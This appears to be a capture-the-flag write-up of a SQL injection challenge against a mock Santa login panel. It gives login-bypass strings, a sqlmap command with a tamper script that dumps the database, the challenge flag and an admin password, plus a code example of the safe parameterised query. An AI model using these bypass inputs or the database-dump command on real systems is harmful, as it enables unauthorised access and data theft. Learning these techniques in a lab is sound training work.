Someone stole Santa's gift list!
Web Exploitation ; sql injection ; sqli ; sqlmap
Resources
List of SQL Commands: https://www.codecademy.com/articles/sql-commands
Check out this cheat sheet: swisskyrepo/PayloadsAllTheThings
Payload list: payloadbox/sql-injection-payload-list
In-depth SQL Injection tutorial: SQLi Basics
Challenge

Without using directory brute forcing, what's Santa's secret login panel?

/santapanel
Visit Santa's secret login panel and bypass the login using SQLi

Username
'or true --
Password
'--

No answer needed
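The bypass above works only because the panel pastes the submitted username straight into the SQL text. The following added example (not the challenge's code; the users table, its single row and the column names are constructed assumptions) reproduces that with SQLite: the concatenating login accepts 'or true -- and the parameterised version of the same query does not.

```python
import sqlite3


def build_db():
    # Constructed lab database standing in for the panel's real one.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('santa', 'lab-password')")
    return conn


def login_vulnerable(conn, username, password):
    # User input is spliced into the statement, so with username
    # 'or true -- the WHERE clause becomes
    #   username = '' or true -- ' AND password = ...
    # a tautology followed by a comment that swallows the password check.
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Bound parameters are passed to the engine as data; the quote and the
    # comment marker never reach the SQL parser as syntax.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    conn = build_db()
    injected = ("'or true --", "'--")
    return {
        "vulnerable": login_vulnerable(conn, *injected),  # 'santa'
        "safe": login_safe(conn, *injected),              # None
        "safe_valid": login_safe(conn, "santa", "lab-password"),
    }
```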
How many entries are there in the gift database?

Save the login request from the panel to santapanel.req and let sqlmap dump the SQLite database; the space2comment tamper script replaces spaces with inline comments so the payloads pass the panel's filtering:

sqlmap -r santapanel.req --tamper=space2comment --dump-all --dbms=sqlite


22
What did Paul ask for?

Github Ownership
What is the flag?

thmfox{All_I_Want_for_Christmas_Is_You}
What is admin's password?

EhCNSWzzFP6sc7gB